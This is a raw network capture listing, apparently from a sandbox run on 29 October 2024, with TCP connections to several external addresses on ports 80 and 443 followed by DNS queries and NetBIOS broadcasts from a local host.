                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.157201052 CET8060779142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.157267094 CET6077980192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.916248083 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.922055006 CET806047951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.096103907 CET806047951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.096214056 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.151366949 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.151395082 CET4436078051.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.151653051 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.153693914 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.153700113 CET4436078051.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.883877039 CET4436078051.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.889178038 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.932789087 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.932806015 CET4436078051.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.933166981 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.933175087 CET4436078051.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114008904 CET4436078051.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114063978 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114078999 CET4436078051.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114103079 CET4436078051.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114130020 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114156008 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114223957 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114237070 CET4436078051.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114257097 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.114281893 CET60780443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.368151903 CET6078180192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.373621941 CET806078164.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.373740911 CET6078180192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.373943090 CET6078180192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.379332066 CET806078164.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.305845976 CET806078164.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.305901051 CET806078164.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.305958986 CET6078180192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.306041956 CET6078180192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.306375980 CET6078180192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.306375980 CET6078180192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.517168999 CET6078280192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.522681952 CET8060782108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.522784948 CET6078280192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.523170948 CET6078280192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.528491974 CET8060782108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.445482016 CET8060782108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.445511103 CET8060782108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.445554018 CET6078280192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.445581913 CET6078280192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.445882082 CET6078280192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.445931911 CET6078280192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.799221992 CET6078380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.804811954 CET8060783142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.805007935 CET6078380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.805192947 CET6078380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.810561895 CET8060783142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.726351023 CET8060783142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.726416111 CET8060783142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.726455927 CET6078380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.726484060 CET6078380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.726901054 CET6078380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.726914883 CET6078380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.507155895 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.512582064 CET806047951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.686666012 CET806047951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.686789989 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.691673994 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.691720963 CET4436078451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.691790104 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.692111969 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.692126989 CET4436078451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.500016928 CET4436078451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.507339001 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.545375109 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.545375109 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.545387030 CET4436078451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.545403004 CET4436078451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.719551086 CET4436078451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.719839096 CET4436078451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.719980001 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.720074892 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.720094919 CET4436078451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.720150948 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.721944094 CET60784443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.046192884 CET6078580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.051723003 CET806078564.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.051796913 CET6078580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.059391975 CET6078580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.064831972 CET806078564.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.989767075 CET806078564.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.989830017 CET806078564.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.990310907 CET6078580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.990868092 CET6078580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.990868092 CET6078580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:01.209182978 CET6078680192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:01.214767933 CET8060786108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:01.221180916 CET6078680192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:01.233608007 CET6078680192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:01.239099026 CET8060786108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:02.143970966 CET8060786108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:02.144040108 CET8060786108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:02.144047022 CET6078680192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:02.144123077 CET6078680192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:02.144965887 CET6078680192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:02.145052910 CET6078680192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.120920897 CET6111053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.146590948 CET53611101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.551199913 CET5915953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.559124947 CET53591591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.160613060 CET5005553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.168415070 CET53500551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.427300930 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.427611113 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.821377039 CET5072353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.176616907 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.361577988 CET53507231.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.943120003 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.657756090 CET6024053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.665932894 CET53602401.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.682634115 CET5069053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.715051889 CET53506901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.801676989 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.801709890 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.567245007 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.332870960 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.087328911 CET6375453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.174757004 CET53637541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.098721027 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.098761082 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.455091953 CET6247953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.771855116 CET53624791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.848588943 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.614171028 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.700433969 CET5410953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.052191019 CET53541091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:11.380033016 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:12.129787922 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:12.895381927 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:16.652674913 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:16.652674913 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:17.398890018 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:17.716428041 CET5350653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:17.727978945 CET53535061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:18.161047935 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:19.948426008 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:19.948468924 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:20.707901001 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:21.473506927 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.245733976 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.245764017 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.610840082 CET6454753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.699196100 CET53645471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.989309072 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.754846096 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:26.321055889 CET5017553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:26.350033998 CET53501751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:26.536125898 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:27.301635981 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.067245960 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:31.573311090 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:31.573410034 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:32.317301035 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:32.686290979 CET5353579162.159.36.2192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.082896948 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.348097086 CET6375353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.356729031 CET53637531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:34.848562956 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:34.848668098 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.598650932 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.652488947 CET5628053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.738554955 CET53562801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.364137888 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.176812887 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.176881075 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.926624060 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:39.692250013 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:41.458014965 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:42.223514080 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:42.989139080 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:46.004436016 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:46.004478931 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:46.739176989 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:47.339847088 CET6102753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:47.428945065 CET53610271.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:47.504770041 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:49.270430088 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:49.270498991 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:50.020392895 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:50.785998106 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:52.551717043 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:52.551774979 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:53.317267895 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.082930088 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.864283085 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.629798889 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.747935057 CET5690953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.835568905 CET53569091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.379910946 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.222489119 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.222739935 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.958010912 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.707911015 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:03.473622084 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:03.473726034 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:04.223598003 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:04.989161968 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:06.159327984 CET6083753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:06.496651888 CET53608371.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:06.739248991 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:06.739296913 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:07.489310026 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:08.254786015 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:10.020579100 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:10.786055088 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:11.536086082 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:13.157568932 CET6119053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:13.165195942 CET53611901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:14.415278912 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:14.415380001 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:15.161060095 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:15.926697016 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:17.677778959 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:17.677936077 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:18.442300081 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:19.192363024 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:19.316895008 CET4919453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:19.405249119 CET53491941.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:20.958137035 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:20.958169937 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:21.723534107 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:22.473572016 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:24.239269018 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:24.989203930 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:25.421792030 CET5384653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:25.509668112 CET53538461.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:25.739200115 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:28.657001972 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:28.657093048 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:29.395441055 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:30.161056042 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:31.047224045 CET5059653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:31.136526108 CET53505961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:31.926753998 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:31.926805019 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:32.692282915 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:33.442310095 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:35.219264984 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:35.220957041 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:35.960958004 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:36.188956022 CET6137553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:36.277333975 CET53613751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:36.723539114 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:38.489351988 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:39.254924059 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:40.004815102 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:41.555084944 CET5247153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:41.643788099 CET53524711.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:43.691917896 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:43.691999912 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:44.426759958 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:45.192298889 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:46.958043098 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:46.958081961 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.249954939 CET6469053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.525832891 CET53646901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.708981037 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:48.457946062 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:50.228182077 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:50.228338003 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:50.973589897 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:51.739188910 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:53.643198013 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:53.710174084 CET5229653192.168.2.51.1.1.1
